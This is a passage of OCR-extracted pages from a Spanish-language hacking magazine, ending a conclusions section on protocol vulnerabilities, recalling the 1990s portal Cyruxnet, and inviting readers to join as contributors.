un largo tiempo la expectativa del des-
cubrimiento de vulnerabilidades en el
diseo del nuevo protocolo as como de
las implementaciones de este en todos los
productos comerciales que se usen.
Una parte considerable de riesgos de
Con
clu
sio
nes
www.hackingmexico.mx
39
old school
School
Old A
qui recordaremos
con nostalgia los
viejos tiempos,
las tcnicas
usadas, y eventos
Cyruxnet,
un portal
informatico que
existio en los
aos 90s donde
se publicaron
por primera
vez tcnicas
exclusivas,
tales como
ocultamiento de
.exes
40
www.hackingmexico.mx
seccion o articulo
www.hackingmexico.mx
41
seccion o articulo
42
www.hackingmexico.mx
I N T E G R AT E C O N N O S O T R O S
UNETE A NUESTRO EQUIPO DE COLABORADORES
informes 55 10 68 88 09
info@hackingmexico.mx
#01